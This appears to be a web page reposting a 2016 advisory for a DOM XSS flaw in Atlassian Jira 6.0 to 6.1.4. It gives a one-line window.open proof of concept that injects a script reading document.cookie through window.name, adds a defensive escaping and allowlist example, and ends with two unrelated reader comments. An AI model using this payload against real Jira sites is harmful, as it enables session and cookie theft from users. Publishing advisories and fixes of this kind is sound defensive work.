Atlassian Jira | DOM XSS Vulnerability | Unauthenticated

Atlassian Jira is a widely used project management platform, offering robust tools for tracking, managing, and collaborating on projects. Its features, including issue tracking and customizable workflows, make it a staple in software development and project management.

DOM XSS (Cross-Site Scripting) is a medium-severity vulnerability specific to web applications. It allows malicious scripts to be injected directly into a web page's Document Object Model (DOM), putting users at risk. Prompt identification and remediation of this vulnerability are essential to safeguarding a web application's integrity and security.

Proof of Concept

# Exploit Title: Atlassian Jira 6.0.* <= 6.1.4 DOM XSS
# Date : 27.01.2016
# Author: Razvan Cernaianu
# Vendor Homepage: https://www.atlassian.com
# Version: 6.0.* <= 6.1.4
# Blog: www.TinKode.com

Vulnerable code

# Vulnerable Parameter: $window.name
<div class="aui-page-header-main">

var victim = window.open('https://victim/secure/Dashboard.jspa', '<script>alert(document.cookie);<\/script>');
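The flaw from a defender's side, as an added example that is not from the original advisory or from Atlassian's code: an untrusted window.name (which is what the second argument of window.open above becomes in the opened document) concatenated straight into markup, beside a version that validates it against an allowlist and escapes it. The header markup and function names are assumptions; the page shows only the class name and the injection vector.

```javascript
// Added example, not code from the original advisory or from Atlassian.
// The sink functions and the markup are assumptions; the page only shows the
// class name "aui-page-header-main" and the window.name injection vector.

// Allowlist for values a page is willing to treat as a window name.
const WINDOW_NAME_PATTERN = /^[A-Za-z0-9_-]{1,64}$/;

// Return the name if it matches the allowlist, otherwise an empty string.
function sanitizeWindowName(name) {
  if (typeof name !== 'string' || !WINDOW_NAME_PATTERN.test(name)) {
    return '';
  }
  return name;
}

// Escape the five characters that matter in an HTML text or attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable pattern: untrusted window.name concatenated straight into markup
// that is later assigned to innerHTML. Kept only to contrast with the fix.
function renderHeaderUnsafe(name) {
  return '<div class="aui-page-header-main">' + name + '</div>';
}

// Hardened pattern: validate against the allowlist, then escape before the
// value reaches any HTML context. In a browser, prefer assigning the cleaned
// value through textContent so no HTML parsing happens at all.
function renderHeaderSafe(name) {
  const clean = sanitizeWindowName(name);
  return '<div class="aui-page-header-main">' + escapeHtml(clean) + '</div>';
}

// Constructed sample: the shape of the second window.open() argument above,
// which becomes window.name in the opened document.
const SAMPLE_NAME = '<script>alert(document.cookie);</script>';

// Constructed benign sample: a name the allowlist accepts unchanged.
const BENIGN_NAME = 'dashboard_42';
```

Detection-wise, any read of window.name that feeds innerHTML, document.write or jQuery's html() without passing through a check like sanitizeWindowName is the pattern to grep for.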
  1. I have a problem and it goes something like this:
    A few years ago I created a Google account and uploaded a picture of myself, and now I want to delete it.
    How can I delete that picture if I no longer have access to the account?

  2. Great post, I don't know much programming but this seems interesting.